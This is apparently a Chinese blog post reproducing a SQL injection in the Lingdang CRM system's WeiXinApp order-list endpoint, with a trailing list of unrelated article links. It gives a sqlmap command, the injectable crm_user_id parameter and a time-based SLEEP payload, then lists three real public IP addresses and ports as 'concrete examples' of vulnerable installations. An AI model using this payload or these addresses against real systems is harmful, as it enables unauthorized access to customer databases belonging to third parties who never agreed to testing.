当前位置: 首页 > article >正文

【渗透测试】-灵当CRM系统-sql注入漏洞复现

文章目录

概要  

灵当CRM系统sql注入漏洞:  

具体实例: 

技术名词解释 

小结

概要   

近期灵当CRM系统爆出sql注入漏洞,我们来进行nday复现。

灵当CRM系统sql注入漏洞:

Python sqlmap.py -u

"http://0.0.0.0:0000/crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1 "

得到pyload:

module=WxOrder&action=getOrderList&crm_user_id=1

AND (SELECT 8411 FROM (SELECT(SLEEP(5)))AlRO)

返回信息:

具体实例:

1. http://8.130.119.94:85/crm/

2. 121.204.162.153:82/crm

3. 175.178.129.225:85/crm/

技术名词解释

payload:hacker通过漏洞向受攻击系统发送的恶意代码或指令,用于实现攻击目的。

CRM系统:客户关系管理系统,是一种通过信息化手段来自动化、规范化管理客户关系和客户数据的软件系统,主要目的是帮助企业提升客户满意度、增加客户忠诚度,从而实现业务增长与盈利能力的提高。

小结

通常一个系统漏洞的危害在于用户的数量,用户的数量,影响的范围越广。


http://www.kler.cn/a/319814.html

相关文章:

  • 【月之暗面kimi-注册/登录安全分析报告】
  • idea 弹窗 delete remote branch origin/develop-deploy
  • 深入解析贪心算法及其应用实例
  • 1.两数之和-力扣(LeetCode)
  • WordPress 6.7 “Rollins”发布
  • 成都睿明智科技有限公司解锁抖音电商新玩法
  • 传输层协议 —— TCP协议(下篇)
  • Spring IoC DI 之 属性注入
  • BottomNavigationView 添加角标
  • c++开发实战之网络编程(一)
  • 三维重建的几何评价指标
  • 面试算法题精讲:求数组两组数差值和的最大值
  • 只出现一次的数字 II
  • Redis:事务
  • Hive 的窗口函数 详解
  • 代码随想录算法训练营| 454.四数相加II 、 383. 赎金信 、 15. 三数之和 、 18. 四数之和
  • 有威胁的武器武装检测系统源码分享
  • WebGL渲染与创建2D内容
  • 树——数据结构
  • 移动端如何实现智能语音交互
  • 【LGR-200-Div.4】洛谷入门赛 #27 A - H题解,包含(C++, Go语言)
  • Mybatis中sql数组为空判断
  • SpringBoot 整合docker,执行容器服务
  • Qt系统相关——事件
  • JavaScript --模版字符串用反引号
  • Qt (19)【Qt 线程安全 | 互斥锁QMutex QMutexLocker | 条件变量 | 信号量】